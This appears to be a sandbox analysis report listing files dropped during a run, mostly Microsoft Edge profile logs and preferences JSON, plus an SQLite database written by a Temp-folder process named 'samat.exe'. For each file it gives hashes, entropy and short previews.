                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE987a4q2P923oH+TcwtfrzAdIFUt8YE987bZmw+YE987MDkwO923oH+TcwtfrzS:k989v4Yeb9FUt8/98v/+/98O5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:AB27A5B6F10266976CAD752424450795
                                                                                                                                                                                                                                                                                    SHA1:B44EB633CCDE5265F09F617B6BCA68F71020CF89
                                                                                                                                                                                                                                                                                    SHA-256:1E53DD86E27586817AA2B163DCA712C31384FCE5FEABBC4EAB66CA850304A8FC
                                                                                                                                                                                                                                                                                    SHA-512:18A28DF4051FA09CA371F6EF93D9BF35927DC3A23F53DFEDD50065530357E7FE3F4311E513633506C60BAD727BD891A56543419B1E55B2FD93625F6F06A66E52
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.315 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/21-16:13:03.316 714 Recovering log #3.2024/11/21-16:13:03.317 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):339
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.173549775034699
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE987a4q2P923oH+TcwtfrzAdIFUt8YE987bZmw+YE987MDkwO923oH+TcwtfrzS:k989v4Yeb9FUt8/98v/+/98O5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:AB27A5B6F10266976CAD752424450795
                                                                                                                                                                                                                                                                                    SHA1:B44EB633CCDE5265F09F617B6BCA68F71020CF89
                                                                                                                                                                                                                                                                                    SHA-256:1E53DD86E27586817AA2B163DCA712C31384FCE5FEABBC4EAB66CA850304A8FC
                                                                                                                                                                                                                                                                                    SHA-512:18A28DF4051FA09CA371F6EF93D9BF35927DC3A23F53DFEDD50065530357E7FE3F4311E513633506C60BAD727BD891A56543419B1E55B2FD93625F6F06A66E52
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.315 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/21-16:13:03.316 714 Recovering log #3.2024/11/21-16:13:03.317 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
